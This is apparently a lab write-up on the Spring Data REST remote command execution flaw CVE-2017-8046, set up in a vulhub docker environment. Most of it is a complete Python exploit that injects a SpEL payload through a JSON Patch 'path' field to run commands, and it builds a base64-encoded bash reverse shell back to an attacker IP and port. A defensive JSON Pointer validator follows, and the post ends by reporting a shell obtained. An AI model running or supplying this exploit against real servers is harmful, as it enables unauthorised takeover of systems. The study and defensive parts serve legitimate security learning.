CVE-2017-8046 Spring Data REST remote command execution vulnerability
This post is mainly about learning to write a PoC and exploit; the root cause of the vulnerability is not covered in depth.
Environment setup
cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d
Vulnerability principle
The vulnerability comes from improper handling of the PATCH method: the "path" field of a JSON Patch document is evaluated as a SpEL expression, so an attacker can achieve RCE with crafted JSON data. At root it is RCE through Spring's SpEL evaluation.
Affected versions
Spring Data REST before 2.6.9 and before 3.0.9 (2.6.9 and 3.0.9 themselves are not affected); Spring Boot (if the Spring Data REST module is used) before 1.5.9 and before 2.0 M6.
PoC and EXP
```python
import base64
import os
import requests
import json

# JSON Patch media type; the vulnerable handler evaluates "path" with SpEL
header = {"Content-Type": "application/json-patch+json"}
path = "/customers/1"


def poc(url):
    cmd = "touch /tmp/success"
    cmdUnicode = strToAscii(cmd)
    # Turn the Python list "[116, 111, ...]" into a Java array literal "{116, 111, ...}"
    payload = f"{cmdUnicode}".replace("[", "{").replace("]", "}")
    data = [{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]
    payloadData = json.dumps(data)
    html = requests.patch(url=url + path, headers=header, data=payloadData).text
    number = os.path.basename(__file__).split(".")[0]
    # The SpEL evaluator reports "EL1010E: Property ..." after the expression has run
    if html.find("EL1010E: Property") > 0:
        outPocTrue(number, url, path)
    else:
        outPocFalse(number, url, path)


def exp(url, lhost, lport):
    cmd = bash(lhost, lport)
    cmdUnicode = strToAscii(cmd)
    payload = f"{cmdUnicode}".replace("[", "{").replace("]", "}")
    data = [{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]
    payloadData = json.dumps(data)
    requests.patch(url=url + path, headers=header, data=payloadData)


def true_url(url):
    # Normalise the target: strip a trailing slash and add a scheme if missing
    if url[-1] == "/":
        url = url[0:-1]
    if not url.startswith("http"):
        url = "http://" + url
    return url


def bash(ip, port):
    m = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1"
    s = str(base64.b64encode(m.encode("utf-8")), "utf-8")
    bash_code = "bash -c {echo," + s + "}|{base64,-d}|{bash,-i}"
    return bash_code


def strToAscii(code):
    # Convert a string to its list of code points
    poc = []
    for i in code:
        poc.append(ord(i))
    return poc


def outPocTrue(number, url, path):
    print(f"[+] The VULN {number} exists, path is : {url}{path}")


def outPocFalse(number, url, path):
    print(f"[-] The VULN {number} no exists")


def bash64ToAscii(code):
    # Alternative encoding of the command as a chain of Character.toString() calls (unused above)
    poc = "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % ord(code[0])
    for ch in code[1:]:
        poc += ".concat(T(java.lang.Character).toString(%s))" % ord(ch)
    poc += ")}"
    return poc


url = true_url("192.168.29.129:8080")
ip = "192.168.29.135"
port = 6666
poc(url)
exp(url, ip, port)
```
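As an added defensive counterpart (my own example, not code from the original post, from vulhub or from Spring): because the root cause is that the JSON Patch "path" is handed to SpEL, a gateway, WAF or pre-filter can reject any PATCH body whose "path" or "from" is not a syntactically valid RFC 6901 JSON Pointer before it reaches the application. The allowed field set is an assumption made for this example.

```python
import json
import re

# RFC 6901 JSON Pointer: empty string, or "/"-separated segments in which
# "~" may only appear as the escapes "~0" and "~1".
_POINTER_RE = re.compile(r"^(/([^/~]|~[01])*)*$")

# Property names the "customers" resource legitimately exposes.
# Constructed for this example; a real deployment would derive them from the entity.
ALLOWED_FIELDS = {"firstname", "lastname", "email"}


def is_json_pointer(path):
    """True only if path is a syntactically valid RFC 6901 JSON Pointer."""
    return isinstance(path, str) and _POINTER_RE.match(path) is not None


def _first_segment(pointer):
    """Unescape and return the first segment of a JSON Pointer ('' for the root)."""
    seg = pointer.lstrip("/").split("/")[0]
    return seg.replace("~1", "/").replace("~0", "~")


def check_patch_document(body):
    """Return a list of (index, reason) findings for a JSON Patch body.

    An empty list means the document is clean. The check is purely syntactic,
    so a SpEL-shaped path such as 'T(java.lang.Runtime)...' is rejected without
    ever being interpreted.
    """
    findings = []
    try:
        ops = json.loads(body)
    except ValueError:
        return [(-1, "body is not valid JSON")]
    if not isinstance(ops, list):
        return [(-1, "JSON Patch body must be an array of operations")]
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append((i, "operation is not an object"))
            continue
        for key in ("path", "from"):
            if key not in op:
                continue
            p = op[key]
            if not is_json_pointer(p):
                findings.append((i, f"{key} is not a JSON Pointer: {str(p)[:40]!r}"))
            elif _first_segment(p) not in ALLOWED_FIELDS:
                findings.append((i, f"{key} targets unknown field {p!r}"))
    return findings
```

The same syntactic check also catches the "EL1010E" probing described above before the server has a chance to evaluate anything.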
After running it, the vulnerability was confirmed and a reverse shell was obtained successfully.